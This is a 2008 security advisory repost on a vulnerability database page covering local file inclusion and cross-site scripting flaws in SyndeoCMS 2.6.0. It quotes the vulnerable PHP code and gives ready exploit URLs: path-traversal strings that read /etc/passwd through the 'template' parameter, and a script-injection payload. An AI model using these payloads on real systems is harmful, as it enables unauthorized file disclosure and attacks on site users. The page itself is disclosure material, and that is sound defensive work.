Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : WLB-2008120002          

  Topic : SyndeoCMS 2.6.0 (LFI/XSS) Multiple Remote Vulnerabilities
  WLB : WLB-2008120002  (About)
  SecurityAlert : 4660
  Date : 2008-12-01
  Credit          : CWH Underground
  Added by     : SecurityReason
  SecurityRisk : Medium  alert  (About)
  Remote : Yes
  Local     : No
  Status   : Bug

  History :
[2008-12-01] Started

  Affected software :  

SyndeoCMS 2.6.0

  Text :  

===========================================================
SyndeoCMS 2.6.0 (LFI/XSS) Multiple Remote Vulnerabilities
===========================================================

,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team
..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'


AUTHOR : CWH Underground
DATE : 10 June 2008
SITE : www.citec.us


#####################################################
APPLICATION : SyndeoCMS
VERSION : 2.6.0 (Lastest Version)
DOWNLOAD : http://downloads.sourceforge.net/syndeocms
#####################################################

---LFI---

#################################################################
Vulnerable Code:
if (IsSet ($_GET['template']))
{
$template_path = ...;
$filename = $template_path . "/" . $_GET['template'];
if (file_exists($filename))
{
$handle = fopen($filename, "r");
$content = fread($handle, filesize($filename));
fclose($handle);
}
}
#################################################################

Vulnerable File:

[+] starnet/editors/fckeditor/studenteditor.php
[+] starnet/modules/sn_news/edit_content.php
[+] starnet/modules/sn_newsletter/edit_content.php

Exploit:

[+]
http://[target]/[path]/starnet/editors/fckeditor/studenteditor.php?template
=../../../../../../../../../etc/passwd
[+]
http://[target]/[path]/starnet/index.php?option=modulemanager&module=16
&modoption=edit_article&cat_id=1&article_id=0&template=../.
./../../../../../../../../../../../etc/passwd
[+]
http://[target]/[path]/starnet/index.php?option=modulemanager&module=17
&modoption=edit_newsletter&newsletter_id=1&edition=1&templa
te=../../../../../../../../../../../../../etc/passwd

Note: - the first link requires pupil session (normal student
session)
- the second link and the third link require admin session


---XSS---

[+] index.php

Example:

http://[target]/[path]/index.php?page=1&section="><script>
;alert(111);</script>

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################

update:
see: http://www.syndeocms.org/forum/index.php?topic=1788.0


  References :  

No

If you want change this note, please use UCP


Alert

Microsoft VISTA TCP/IP stack buffer overflow

high- 2008-11-27

Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory.

Apache rss

» Apache Tomcat information
   disclosure

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability

PHP rss

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

» PHP 5.2.6 (error_log)
   safe_mode bypass

Copyright © SecurityReason. All Rights Reserved.